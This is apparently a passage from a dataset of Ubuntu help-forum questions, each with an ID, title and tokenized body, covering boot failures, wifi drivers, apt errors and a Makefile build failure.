cdc data binterfacesubclass 0 unused binterfaceprotocol 0 iinterface 7 cdc acm data endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 2 device status : 0x0000 ( bus powered ) when i connect the device , syslog says : mar 29 13:19:32 tile440 kernel : [ 772995.263614 ] usb 2-2 : new high-speed usb device number 17 using xhci_hcd mar 29 13:19:32 tile440 kernel : [ 772995.282108 ] usb 2-2 : new usb device found , idvendor=04e8 , idproduct=6860 mar 29 13:19:32 tile440 kernel : [ 772995.282117 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 mar 29 13:19:32 tile440 kernel : [ 772995.282122 ] usb 2-2 : product : samsung_android mar 29 13:19:32 tile440 kernel : [ 772995.282126 ] usb 2-2 : manufacturer : samsung mar 29 13:19:32 tile440 kernel : [ 772995.282130 ] usb 2-2 : serialnumber : 59c264f2 mar 29 13:19:32 tile440 colord : device added : sysfs-samsung-samsung_android i 've plugged the phone into all usb ports ( black tongues , so that is usb 2.0 right ? )
440574	avconv - extract one video frame and repeat it	i 'd like to repeat one frame from a source video to output . i 've tried the following avconv -ss 00:20:00 -i input_video -t 0.5 -vsync 1 -an -r 1 -vcodec libx264 video_1f avconv -i video_1f -t 10 -r 1 -vcodec libx264 output_video but i found that -ss does n't work in the former command , and it would always extract the first frame of input video ; in the latter -t has no effects and the duration of the output video will be 2 seconds . any suggestion ? or , is there a better approach ?
440576	ubuntu 12.04 dual boot fails to load ( black screen )	i have a dual boot windows 7 + ubuntu 12.04 system ( 64 bit ) . about a week ago , using grub to load into ubuntu resulted in a freeze at the loading screen . i could still run into recovery mode , so using the console from that i tried a few solutions i found on the web . sudo apt-get update sudo apt-get upgrade sudo apt-get install fglrx sudo aticonfig -- initial sudo reboot no luck there . then i tried updating the nvidia drivers ( gtx 760 ) : sudo apt-get update sudo apt-get purge nvidia-* sudo apt-get install nvidia-current-updates still nothing . in fact , now i just get a black screen with a blinking cursor when i boot into ubuntu regularly . i can still boot into recovery mode , and can not find a solution . text appears when i shut down off the blinking cursor screen ( it turns purple , and says something like `` terminating ubuntu '' ) . i am a new user to linux , and the most advanced thing i 've done in terminal is using the nano editor . this may be important , so about a week before this error started , i used a partition tool to increase ubuntu 's main partition to 100 gigs . after that , both ubuntu and windows still worked normally , until the error described above . windows still works fine ( posting this question while in windows on the same machine ) .
440577	plex media server can not access pogoplug mount on ubuntu	i 'm trying to build a ubuntu server ( 12.04 ) machine which will stream my videos hosted on my pogoplug cloud account thru plex media server ( pms ) . i mounted my pogoplug cloud account successfully to /media/pogoplug with the help of the below article http : //tuxtweaks.com/2013/06/mount-your-pogoplug-on-linux/ and , i could read and write files to my pogoplug cloud when i login with my username . however , pms is not able to access my pogoplug cloud content . while adding a section in pms , when i click on `` add folder '' i could see `` / '' , `` boot '' and `` pogoplug '' in the left hand side list . however , clicking on `` pogoplug '' is not showing its content . i tried things like adding `` plex '' user to a lot of groups including sudo but the issue still exists . i 'm not sure what i 'm missing . thank you all for your help . santosh
440578	after installing ubuntu i get a black screen and a blinking curso	i have a laptop , 2 gig amd turion 64 x2 , 3 gigs ram , 120 gig hd . i have tried installing ubuntu from a dvd made from the downloaded iso file , also from a usb made by a friend who recommended ubuntu , both attempt left me with a blinking cursor in the upper left corner of my screen , no error messages and no response from the keyboard . ubuntu works fine with the 'try ubuntu ' option but nothing with the install . any ideas what might be wrong
440580	how does one remove a certificate authority 's certificate from a system ?	the ca-certificates package was just updated , and it caused the following changes on my xubuntu 13.10 system : running hooks in /etc/ca-certificates/update.d ... . adding debian : ca_disig_root_r1.pem adding debian : ca_disig_root_r2.pem adding debian : china_internet_network_information_center_ev_certificates_root.pem adding debian : d-trust_root_class_3_ca_2_2009.pem adding debian : d-trust_root_class_3_ca_2_ev_2009.pem adding debian : pscprocert.pem adding debian : startcom_certification_authority_2.pem adding debian : swisscom_root_ca_2.pem adding debian : swisscom_root_ev_ca_2.pem adding debian : turktrust_certificate_services_provider_root_2007.pem adding debian : verisign_class_3_public_primary_certification_authority_2.pem removing debian : cacert.org_class3.pem removing debian : cacert.org_root.pem removing debian : equifax_secure_ebusiness_ca_2.pem removing debian : tc_trustcenter_universal_ca_iii.pem i 've decided i do n't trust some of these cas , and i would like to remove their certificates . how do i do that ?
440584	steam , missing 32bit libs but it wo n't install	steam needs to install these additional packages : libgl1-mesa-dri : i386 , libgl1-mesa-glx : i386 , libc6 : i386 [ sudo ] password for user : e : the method driver /usr/lib/apt/methods/https could not be found . reading package lists ... done building dependency tree reading state information ... done package libc6 : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : tzdata libdb1-compat locales libc-bin initscripts package libgl1-mesa-glx : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libgl1-mesa-dri : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libgl1-mesa-glx w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : you may want to run apt-get update to correct these problems e : package 'libgl1-mesa-dri : i386 ' has no installation candidate e : package 'libgl1-mesa-glx : i386 ' has no installation candidate e : package 'libc6 : i386 ' has no installation candidate press return to continue : when i type in sudo apt-get update : user @ chrubuntu : ~ $ sudo apt-get update [ sudo ] password for user : e : the method driver /usr/lib/apt/methods/https could not be found . when i type in sudo apt-get install ia32-libs user @ chrubuntu : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : you may want to run apt-get update to correct these problems e : package 'ia32-libs ' has no installation candidate user @ chrubuntu : ~ $ p.s . i 'm a total newbie at ubuntu/linux
440585	network card drive for intel 1200v3rps for ubuntu 12.04 desktop amd64	i am configuring an custom built server with intel server board 1200v3rps . i have installed ubuntu 12.04 desktop amd64 as the os . issue that i am facing in this is , on-board network has not been installed by default . i did a quick search and found that not many people have installed ubuntu on this intel board . intel website gives drivers for redhat & suse only . this is first time i am installing ubuntu on server platform . so far only worked with redhat/centos . kindly let me know how to do i install network card drivers in ubuntu 12.04 . thanks in advance .
440589	unable to log in after playing with tty	i was playing around with switching ttys . at some point , i locked my screen ( ctrl + alt + l ) to switch user , and logged in to guest . this opened up in tty8 . i switched back to tty7 and logged out of my account , switched to tty8 and logged out of guest . i can no longer log into my actual account , but i can still log into guest . i 've restarted my computer , but i still ca n't log in . i think the problem must lie with the tty switching , since nothing else i was doing was out of the usual and this has never happened before . i 'm using ubuntu 12.04 on a thinkpad w530 . update : i was able to create a new administrator account and log into that , so i still have access to all of my old files . when i try to log in to the old account , the screen goes black for a second and i am returned to the log in screen . i am able to log into my old account through tty1 and have access to everything .
440590	ubuntu 12.04 with intel corporation wireless 7260 ( rev 73 )	*-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b0500000-b0501fff i followed the answer from chili555 at networkmanager does n't see my wireless card however , when i do sudo modprobe iwlwifi i get warning : error inserting compat ( /lib/modules/3.2.0-60-generic/updates/compat /compat.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) fatal : error inserting iwlwifi ( /lib/modules/3.2.0-60-generic/updates/drivers /net/wireless/iwlwifi/iwlwifi.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) dmesg shows [ 124.454654 ] cfg80211 : unknown symbol netdev_set_default_ethtool_ops ( err 0 ) [ 124.454715 ] cfg80211 : unknown symbol compat_dependency_symbol ( err 0 ) [ 124.454800 ] cfg80211 : unknown symbol simple_open ( err 0 ) and , my card does n't work .
440592	kde themes does n't appear after download and install	hey everyone i just downloaded the new theme for my my kde from http : //kde-look.org/ . in other tutorial they that extract the package and copy it into /home/username/.kde/share/apps/desktop/theme.but when i when i do that the theme does n't appear in the workspace appearance . can anybody help me solve this problem ?
440593	not able to update 12.04 , error . please help	reading package lists ... error ! w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_i18n_translation-en e : the package lists or status file could not be parsed or opened .
440595	intel wifi drops randomly	i know this topic has been brought up several times , and i searched for hours to find a solution but no success . i 've been using ubuntu precise for several months and everything was fine . but my wifi started dropping randomly from almost 2 weeks ago with no reason that i 'm aware of . in my search i ran into solution regarding power management ( mine is off ) and changing the mtu which did n't work . i 'd very much appreciate any help or hint . i 'm running ubuntu on a laptop , lenovo thinkpad x201 . lspci -nn | grep `` network '' 00:19.0 ethernet controller [ 0200 ] : intel corporation 82577lm gigabit network connection [ 8086:10ea ] ( rev 06 ) 02:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n + wimax 6250 [ kilmer peak ] [ 8086:0089 ] ( rev 35 ) lshw -c network *-network description : ethernet interface product : 82577lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 06 serial : f0 : de : f1:00:21:4b capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.1.4-k firmware=0.12-1 latency=0 link=no multicast=yes port=twisted pair resources : irq:41 memory : f2500000-f251ffff memory : f2525000-f2525fff ioport:1820 ( size=32 ) *-network description : wireless interface product : centrino advanced-n + wimax 6250 [ kilmer peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 35 serial : 00:23:15:2a:94:3c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-37-generic firmware=41.28.5.1 build 33926 ip=10.0.0.3 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:43 memory : f2400000-f2401fff *-network description : ethernet interface physical id : 2 logical name : wmx0 serial : 00:1d : e1:34 : c8:23 capabilities : ethernet physical configuration : driver=i2400m_usb firmware=i6050-fw-usb-1.5.sbcf link=no
440597	dell inspiron 17r 5737 ubuntu 13.10 terrible video	as discussed at http : //ubuntuforums.org/showthread.php ? t=2204287 the video is terrible on ubuntu 13.10 . it is horrible also on 12.04.4 , but works well on 12.04.2 . after loading 12.04.2 , the video continues working even after updating packages . is there any way to get later versions fixed , so that we do n't have to be stuck on 12.04 ? i filed this as a bug report : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1300349
440598	oracle vm issue + ubuntu is not starting	i 'm new to ubuntu and i have this virtual machine issue when installing ubuntu.i have done a huge search to overcome this but i failed.so please help me out . i 'm using oracle vm ( virtual box ) 4.2.14 and i have installed it on windows 8 ( 64 bit ) . following are the settings . and when i start ubuntu , i get the starting screen and screen gets freezes . why and how can i start ubuntu ? please help me out
440599	will i lose all my files from xp os if i install ubuntu ?	i have a simple question . i have a disc particion to c , d and e on my windows xp and i want to install ubuntu . will i lose all my files from d and e ( it 's like 50 gb , and i do n't have an external hdd ) when i install ubuntu ? or the system while installing it offers me options to save my files somewhere or ... ?
440606	( 13.10 ) dropbox install removes unity , software center , and more	my original question ( why i lost unity after rebooting and what i could do about it ) has been somewhat answered , but it 's led to other questions . during my setup of 13.10 , i installed a number of basic programs and edits ( the restricted codexes , chrome , vlc , etc ) . the problem is that when i rebooted the computer , it would come up to just a desktop ( no launcher or taskbar , ctr+alt+t would n't work ) . i followed the suggestions of unity does n't load and , while i could access ccsm , i found i had no unity plugin available to turn on . i reinstalled unity , enabled it , rebooted , and got my launcher and taskbar back . not everything is fixed , though . i figured out that it 's dropbox giving my computer fits ( started rebooting after installing each new thing ) , but it did more than delete unity . my software center is gone , it uninstalled classic menu , and ctr+alt+del brings up xterm , now , instead of the terminal i had before . how do i avoid this ? some users have trouble installing dropbox ( installing it was n't the problem ) and some have no trouble whatsoever , but i ca n't find something quite like this . is there a way to reinstall software center , or see what exactly dropbox deleted ? will i just need to do another fresh install ?
440607	ubuntu 12.04 setting icecast2 server for vlc on iphone to connect to stream	i 'm using ubuntu 12.04 . i want to use icecast2 to create a server at localhost , and have an iphone to connect to the stream with vlc . i followed this post : how do i setup an icecast server for broadcasting audio in my network ? i followed its steps about icecast2 and darkice , and vlc on iphone can connect to the http : //localhost:8000/mystream.mp3 without an error , but it does n't play anything while ubuntu is playing music . what should i do to let my iphone play the music ? i do n't know what other information i should provide , so do please tell me what to add to this question .
440609	i just built a gaming pc and i 'm trying to install ubuntu from a usb	i just built a gaming pc and i 'm trying to install ubuntu 13:10 from a usb . before putting in the usb i changed the boot order to usb 1st then uefi 2nd . so then it loads up a unexbootin option menu with options to install ubuntu , run ubuntu off usb , default , check memory , check for damage help . so i chose boot off usb and the screen just goes black . i waited 1 hour but still there was no response so i restarted the pc by holding down the power button and went back into the bios to put the usb 's uefi as 1st boot priority . this time it came to grub menu asking the same questions . i chose install but still there is a black screen . it anyone could help me out that would be awesome .
440611	installing two version of a software	i downloaded and installed a program from source . now i want to install a newer version , again from source . in both cases i have to add path to bashrc . i am a afraid from upcoming problems , because i think when i type ns ( my program ) in the terminal , linux will not know which one to expose ? is it a correct criteria ?
440615	preventing hard disk being read only in case of hard disk problems	my hard disk is under risk and because of that , the filesysytem permission has changed to be read only . how can i prevent this happening so that i can use my laptop for some more time without any problem ? i already have a backup . all i want is just prevent the filesystem becoming read only .
440616	unable to locate package php5-readline	samitha @ ubuntu : ~ $ sudo apt-get install php5-readline reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php5-readline what would be the issue ?
440617	netflix ( pipelight ) low frame rate with rt-preempt patch	running ubuntu 13.10 stock , i was getting horrible `` jitter '' across the entire os . meaning that , videos would not play smoothly compared to a tv set , compiz effects were not smooth , games were not fluid as if playing on a console , etc . so i recompiled the kernel with the rt-preempt patch , and the situation has greatly improved ! however , this patch has dropped the framerate in netflix ( using pipelight ) to unwatchable levels -- about 5-10 fps by my eyes . yet youtube is better than on windows 7 , with the patch . how could it be that i 'm getting superb performance everywhere except netflix ? i know this is a very obscure problem i am having , but if you have any insight or suggestions , it would be appreciated .
440618	thinkpad fan control not working properly	i have lenovo thinkpad w500 . i have ubuntu 12.10 installed . its fan was not running at full speed , so i installed thinkpad fan control software ( tpfc0.5 ) . i launch it by executing tpfc_start.sh in terminal and entering my password . here 's a screenshot of the program : https : //www.mediafire.com/ ? 76yc1qnmkcn30vh when i try to set the fan speed by either automatic control or manual control , the fan goes to full speed for about 5 seconds , and then it goes back to slow speed . is there something that i 'm missing ? please help me so that the fan remains at full speed all the time until i set it down to a low speed . thanks .
440619	spread workspaces not responding to correct key mapping for esc	the `` spread workspaces '' ( super + s ) function usually takes the esc key to go back to the current workspace . through system settings > keyboard > layout settings > options > caps lock key behaviour , i have selected the `` swap esc and caps lock '' option . however , the spread workspaces animation still only responds to the esc key ( though it has been mapped to caps lock ) . is there a way to fix this ? i 'm using ubuntu 3d on ubuntu 12.04 .
440626	ubuntu 14.04 , upgrade path for final beta - > release ?	i need to build out a new server with long term support . ubuntu 14.04 lts is in final beta . see ubuntu 14.04 lts ( trusty tahr ) final beta released . i 'm ok with using a final beta before the release build is released . but i 'm not clear if there 's an upgrade path from the alphas and betas to release . ( if there 's no upgrade path , i 'd prefer not to use it since this includes a mailbox migration ) . question : will there be an upgrade path from 14.04 final beta to 14.04 release ? note : this could be a duplicate of i installed an alpha or beta , am i up to date with the final release if i keep upgrading ? if the process for 14.04 is the same as previous , then its a duplicate . however , ubuntu 14.04 lts ( trusty tahr ) final beta released does not appear to discuss it .
440630	`` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' error at boot	when i boot my computer . it shows a error in boot screen that `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' but it starts normally if i leave it . i want to stop this error from showing up please help . i am using ubuntu 12.04
440637	updating package catch failed error while using intel graphics installer	i tried everything but this error persist continuously in intel graphics installer for linux error occurred while updating the package cache . error : w : gpg error : https : //download.01.org saucy inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a902dda375e52366 , w : failed to fetch cdrom : //lubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) /dists/saucy/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //lubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) /dists/saucy/multiverse/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //lubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) /dists/saucy/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //lubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) /dists/saucy/universe/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . i m using lubuntu 13.10 . how can i fix this ?
440644	wifi does not work in ubuntu 13.10 and broadcom bcm4313 hardware	i have already tried opensource as well as proprietary drivers but nothing seems to work . i 'm stuck on this from 3 days , nothing seems to work . first i installed the proprietary drivers with apt-get install bcmwl-kernel-source this did not work , so i purged it and went for the default brcmsmac driver . modprobe -rv wl modprobe -v brcmsmac even this did not work . so installed b43 driver apt-get install firmware-b43-installer i read the wireless wiki and all related questions on this but none of them seems to work for me.please help..
440645	'make ' compiling error in ubuntu	i installed ubuntu 14.04 by debootstrap with those packages required for configuring or building a specific package . everything went well but one thing , it could not build or compile ( or configure ) some packages especially the linux kernel it just spews up a lots of errors like this : mark @ dhcppc0 : ~/kernel-3.13.7 $ make menuconfig hostcc scripts/basic/fixdep /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string hostcc scripts/kconfig/conf.o /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string /bin/sh : 1 : syntax error : unterminated quoted string make [ 1 ] : *** [ scripts/kconfig/dochecklxdialog ] error 2 make : *** [ menuconfig ] error 2 another one ( when i 'm compiling ppsspp ) mark @ dhcppc0 : ~/ppsspp/build $ make ( test -e makefile.native || /usr/lib/i386-linux-gnu/qt5/bin/qmake /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & make -f makefile.native /bin/sh : 1 : syntax error : unterminated quoted string make : *** [ sub-native-pro-make_first-ordered ] error 2 plus , they have this common line : /bin/sh : 1 : syntax error : unterminated quoted string and they all end in error 2 could someone shed light on this problem ? edit : i forgot to say that i set the home directory to /home/mark/mark's-builds i got this linux kernel from here and the make file is in here the makefile for ppsspp is : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # makefile for building : ppssppqt # generated by qmake ( 3.0 ) ( qt 5.2.1 ) # project : ../qt/ppssppqt.pro # template : subdirs # command : /usr/lib/i386-linux-gnu/qt5/bin/qmake -o makefile ../qt/ppssppqt.pro # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # makefile = makefile first : make_first qmake = /usr/lib/i386-linux-gnu/qt5/bin/qmake del_file = rm -f chk_dir_exists= test -d mkdir = mkdir -p copy = cp -f copy_file = cp -f copy_dir = cp -f -r install_file = install -m 644 -p install_program = install -m 755 -p install_dir = $ ( copy_dir ) del_file = rm -f symlink = ln -f -s del_dir = rmdir move = mv -f subtargets = \ sub-native-pro \ sub-core-pro \ sub-common-pro \ sub-ppsspp-pro sub-native-pro-qmake_all : force $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native $ ( make ) -f makefile.native qmake_all sub-native-pro : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native sub-native-pro-make_first-ordered : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native sub-native-pro-make_first : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native sub-native-pro-all-ordered : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native all sub-native-pro-all : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native all sub-native-pro-clean-ordered : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native clean sub-native-pro-clean : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native clean sub-native-pro-distclean-ordered : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native distclean sub-native-pro-distclean : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native distclean sub-native-pro-install_subtargets-ordered : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native install sub-native-pro-install_subtargets : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native install sub-native-pro-uninstall_subtargets-ordered : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native uninstall sub-native-pro-uninstall_subtargets : force ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native uninstall sub-core-pro-qmake_all : sub-native-pro-qmake_all force $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core $ ( make ) -f makefile.core qmake_all sub-core-pro : force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core sub-core-pro-make_first-ordered : sub-native-pro-make_first-ordered force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core sub-core-pro-make_first : force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core sub-core-pro-all-ordered : sub-native-pro-all-ordered force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core all sub-core-pro-all : force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core all sub-core-pro-clean-ordered : sub-native-pro-clean-ordered force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core clean sub-core-pro-clean : force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core clean sub-core-pro-distclean-ordered : sub-native-pro-distclean-ordered force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core distclean sub-core-pro-distclean : force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core distclean sub-core-pro-install_subtargets-ordered : sub-native-pro-install_subtargets-ordered force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core install sub-core-pro-install_subtargets : force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core install sub-core-pro-uninstall_subtargets-ordered : sub-native-pro-uninstall_subtargets-ordered force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core uninstall sub-core-pro-uninstall_subtargets : force ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core uninstall sub-common-pro-qmake_all : sub-core-pro-qmake_all force $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common $ ( make ) -f makefile.common qmake_all sub-common-pro : force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common sub-common-pro-make_first-ordered : sub-core-pro-make_first-ordered force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common sub-common-pro-make_first : force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common sub-common-pro-all-ordered : sub-core-pro-all-ordered force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common all sub-common-pro-all : force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common all sub-common-pro-clean-ordered : sub-core-pro-clean-ordered force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common clean sub-common-pro-clean : force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common clean sub-common-pro-distclean-ordered : sub-core-pro-distclean-ordered force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common distclean sub-common-pro-distclean : force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common distclean sub-common-pro-install_subtargets-ordered : sub-core-pro-install_subtargets-ordered force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common install sub-common-pro-install_subtargets : force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common install sub-common-pro-uninstall_subtargets-ordered : sub-core-pro-uninstall_subtargets-ordered force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common uninstall sub-common-pro-uninstall_subtargets : force ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common uninstall sub-ppsspp-pro-qmake_all : sub-common-pro-qmake_all force $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp $ ( make ) -f makefile.ppsspp qmake_all sub-ppsspp-pro : force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp sub-ppsspp-pro-make_first-ordered : sub-common-pro-make_first-ordered force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp sub-ppsspp-pro-make_first : force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp 